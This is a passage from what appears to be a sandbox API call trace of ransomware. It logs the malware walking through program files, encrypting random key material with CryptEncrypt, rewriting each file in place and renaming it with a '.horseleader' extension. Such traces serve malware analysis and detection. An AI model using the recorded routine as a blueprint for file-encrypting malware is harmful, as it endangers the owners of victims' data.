cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*") returned 73 [0252.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0252.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.067] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\.") returned 73 [0252.067] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0252.067] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0252.067] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.067] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\..") returned 74 [0252.067] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.067] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.067] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0252.067] lstrcmpiW (lpString1="as80.xsl", lpString2="Windows") returned -1 [0252.067] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 80 [0252.067] StrStrIW (lpFirst="as80.xsl", lpSrch=".horseleader") returned 0x0 [0252.067] lstrcmpW (lpString1="as80.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.067] lstrcmpW (lpString1="as80.xsl", lpString2="_uninstalling_.png") returned 1 [0252.068] lstrlenW 
(lpString=".testttjffg") returned 11 [0252.068] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", lpSrch=".testttjffg") returned 0x0 [0252.068] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.068] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.068] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 80 [0252.068] StrStrW (lpFirst="as80.xsl", lpSrch=".txt") returned 0x0 [0252.069] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=17248) returned 1 [0252.069] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4360, lpOverlapped=0x0) returned 1 [0252.071] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbca0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.071] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4360, lpOverlapped=0x0) returned 1 [0252.071] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0252.071] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.071] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.072] CloseHandle (hObject=0x1a4) returned 1 [0252.072] GetProcessHeap () returned 0x780000 [0252.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.072] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.horseleader") returned 92 [0252.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.horseleader")) returned 1 [0252.073] GetProcessHeap () returned 0x780000 [0252.073] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.073] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5ed7d9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4932, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="as90.xsl", 
cAlternateFileName="")) returned 1 [0252.073] lstrcmpiW (lpString1="as90.xsl", lpString2="Windows") returned -1 [0252.073] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 80 [0252.073] StrStrIW (lpFirst="as90.xsl", lpSrch=".horseleader") returned 0x0 [0252.073] lstrcmpW (lpString1="as90.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.073] lstrcmpW (lpString1="as90.xsl", lpString2="_uninstalling_.png") returned 1 [0252.073] lstrlenW (lpString=".testttjffg") returned 11 [0252.073] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl", lpSrch=".testttjffg") returned 0x0 [0252.073] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.074] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 80 [0252.075] StrStrW (lpFirst="as90.xsl", lpSrch=".txt") returned 0x0 [0252.075] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18738) returned 1 [0252.076] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4932, 
lpOverlapped=0x0) returned 1 [0252.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb6ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4932, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4932, lpOverlapped=0x0) returned 1 [0252.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.080] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.080] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.080] CloseHandle (hObject=0x1a4) returned 1 [0252.080] GetProcessHeap () returned 0x780000 [0252.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.080] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.horseleader") returned 92 [0252.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.horseleader")) returned 1 [0252.082] GetProcessHeap () returned 0x780000 [0252.082] HeapFree (in: 
hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.082] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x78e4, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="Informix.xsl", cAlternateFileName="")) returned 1 [0252.082] lstrcmpiW (lpString1="Informix.xsl", lpString2="Windows") returned -1 [0252.082] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 84 [0252.082] StrStrIW (lpFirst="Informix.xsl", lpSrch=".horseleader") returned 0x0 [0252.082] lstrcmpW (lpString1="Informix.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.082] lstrcmpW (lpString1="Informix.xsl", lpString2="_uninstalling_.png") returned 1 [0252.082] lstrlenW (lpString=".testttjffg") returned 11 [0252.082] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl", lpSrch=".testttjffg") returned 0x0 [0252.082] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.082] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 84 [0252.084] StrStrW (lpFirst="Informix.xsl", lpSrch=".txt") returned 0x0 [0252.084] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=30948) returned 1 [0252.084] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.087] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.087] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.088] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x28e4, lpOverlapped=0x0) returned 1 [0252.088] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd71c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.088] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x28e4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x28e4, lpOverlapped=0x0) returned 1 [0252.089] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.089] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.089] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.089] CloseHandle (hObject=0x1a4) returned 1 [0252.089] GetProcessHeap () returned 0x780000 [0252.089] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.089] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.horseleader") returned 96 [0252.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.horseleader")) returned 1 [0252.091] GetProcessHeap () returned 0x780000 [0252.091] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.091] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x712e, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="msjet.xsl", cAlternateFileName="")) returned 1 [0252.091] lstrcmpiW (lpString1="msjet.xsl", lpString2="Windows") returned -1 [0252.091] wnsprintfW (in: 
pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 81 [0252.091] StrStrIW (lpFirst="msjet.xsl", lpSrch=".horseleader") returned 0x0 [0252.091] lstrcmpW (lpString1="msjet.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.091] lstrcmpW (lpString1="msjet.xsl", lpString2="_uninstalling_.png") returned 1 [0252.091] lstrlenW (lpString=".testttjffg") returned 11 [0252.091] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl", lpSrch=".testttjffg") returned 0x0 [0252.091] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.091] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.092] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 81 [0252.092] StrStrW (lpFirst="msjet.xsl", lpSrch=".txt") returned 0x0 [0252.092] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=28974) returned 1 [0252.092] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.095] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.096] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.096] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x212e, lpOverlapped=0x0) returned 1 [0252.096] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffded2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.097] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x212e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x212e, lpOverlapped=0x0) returned 1 [0252.097] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.097] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.097] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.097] CloseHandle (hObject=0x1a4) returned 1 [0252.097] GetProcessHeap () returned 0x780000 [0252.098] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.098] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.horseleader") returned 93 [0252.098] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.horseleader")) returned 1 [0252.099] GetProcessHeap () returned 0x780000 [0252.099] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.099] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x851c, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="sql2000.xsl", cAlternateFileName="")) returned 1 [0252.099] lstrcmpiW (lpString1="sql2000.xsl", lpString2="Windows") returned -1 [0252.099] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 83 [0252.099] StrStrIW (lpFirst="sql2000.xsl", lpSrch=".horseleader") returned 0x0 [0252.099] lstrcmpW (lpString1="sql2000.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.099] lstrcmpW (lpString1="sql2000.xsl", lpString2="_uninstalling_.png") returned 1 [0252.099] lstrlenW (lpString=".testttjffg") returned 11 [0252.099] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl", lpSrch=".testttjffg") returned 0x0 [0252.099] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 
[0252.099] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.100] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 83 [0252.101] StrStrW (lpFirst="sql2000.xsl", lpSrch=".txt") returned 0x0 [0252.101] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=34076) returned 1 [0252.101] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.104] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.104] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.104] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x351c, lpOverlapped=0x0) returned 1 [0252.106] SetFilePointerEx (in: hFile=0x1a4, 